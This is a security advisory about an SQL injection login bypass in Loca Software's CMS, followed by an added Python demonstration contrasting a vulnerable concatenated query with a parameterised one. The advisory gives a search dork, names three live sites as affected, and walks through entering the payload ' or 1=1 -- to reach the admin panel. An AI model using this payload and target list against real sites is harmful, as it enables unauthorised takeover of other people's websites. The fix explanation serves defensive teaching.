Loca Software - Sql Injection/Admin Panel Bypass
2024-02-04 06:01:54 Author: cxsecurity.com

# Exploit Title: Loca Software - Sql Injection/Admin Panel Bypass
# Exploit Author: Onur Kara (root9ext)
# Service Provider: LocaSoftware
# Vulnerable URL: /cms/
# Dork: intext:"bu web sitesi LOCA YAZILIM BİLİŞİM TEK. LTD. ŞTİ."
# Vulnerability Type: SQL Injection (authentication bypass)
# Severity: Critical

Vulnerability Description:

A critical SQL injection vulnerability exists in the admin panel login of Loca Software's CMS, served from the /cms/ directory. The login form passes the submitted username and password into the SQL query unsanitized, so an attacker can inject SQL that makes the credential check always true and reach the admin panel without valid credentials.

Proof of Concept (PoC):

Example affected URLs:
- http://izmirsunnetmerkezi.com/cms/
- https://www.ozkankirtasiye.com.tr/cms/
- https://locapp.net/cms/

1. Visit the admin login page, typically located at:
   https://locapp.net/cms/
2. Enter the following payload in both the username and the password field:
   ' or 1=1 --
   ' or 1=1 --
3. Submit the form.
4. Observe that you land in the admin panel instead of being redirected back to the login form, confirming the authentication bypass.

Note: on MySQL the "--" comment marker only takes effect when it is followed by whitespace, so the payload needs a trailing space (or the "-- -" / "#" variants) if the form trims its input.

# Disclaimer: This PoC is for educational purposes only. Unauthorized access to systems or applications is illegal.

Contact: Telegram @rootninext
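The following is an added example, not code from the advisory or from Loca Software: it models the class of bug the advisory describes (form fields concatenated into the login query) against an in-memory SQLite table and shows what the advisory's payload does to the query, next to the same check written with bound parameters. The table name, column names, rows and the clear-text password column are assumptions made for the demonstration; the real CMS schema is not disclosed.

```python
import sqlite3
from typing import Optional, Tuple

# The advisory's payload. The trailing space matters on MySQL, where "--"
# only starts a comment when followed by whitespace; SQLite does not care.
PAYLOAD = "' or 1=1 -- "


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the CMS user table.

    The advisory does not disclose Loca Software's schema; the table name,
    columns and rows here are assumptions for the demonstration. Passwords are
    stored in clear only so the injected SQL is easy to read; real code stores
    a hash and compares it in application code.
    """
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, role TEXT)"
    )
    con.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "S3cret!", "admin"), ("editor", "hunter2", "editor")],
    )
    return con


def build_vulnerable_query(username: str, password: str) -> str:
    """The bug: form fields are pasted straight into the SQL text."""
    return (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )


def login_vulnerable(con: sqlite3.Connection, username: str,
                     password: str) -> Optional[Tuple[str, str]]:
    """Naive login: the first matching row wins, as in the vulnerable CMS."""
    return con.execute(build_vulnerable_query(username, password)).fetchone()


def login_hardened(con: sqlite3.Connection, username: str,
                   password: str) -> Optional[Tuple[str, str]]:
    """Same check with bound parameters: the input is data, never SQL."""
    return con.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


def demo() -> dict:
    """Run the four login attempts and return the row each one matched."""
    con = make_db()
    return {
        "vulnerable_valid": login_vulnerable(con, "editor", "hunter2"),
        "vulnerable_payload": login_vulnerable(con, PAYLOAD, PAYLOAD),
        "hardened_valid": login_hardened(con, "editor", "hunter2"),
        "hardened_payload": login_hardened(con, PAYLOAD, PAYLOAD),
    }


if __name__ == "__main__":
    # Shows the query the payload produces: everything after "--" is a comment,
    # so the WHERE clause collapses to  username = '' OR 1=1
    print(build_vulnerable_query(PAYLOAD, PAYLOAD))
    for name, row in demo().items():
        print(f"{name:20s} -> {row}")
```

With the payload in both fields the vulnerable query becomes `... WHERE username = '' or 1=1 -- ' AND password = '' or 1=1 -- '`; the comment swallows the password check and `OR 1=1` matches every row, so `fetchone()` hands back the first user in the table. That first row is usually the account created at install time, which is why this payload so often lands directly in the admin account rather than in some arbitrary user. The hardened version returns no row for the same input, because a bound parameter containing a quote and `--` is compared as a literal string. Stripping or escaping quotes by hand is not the fix; bound parameters (PDO or mysqli prepared statements in a PHP CMS) are.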



 

Source: https://cxsecurity.com/issue/WLB-2024020019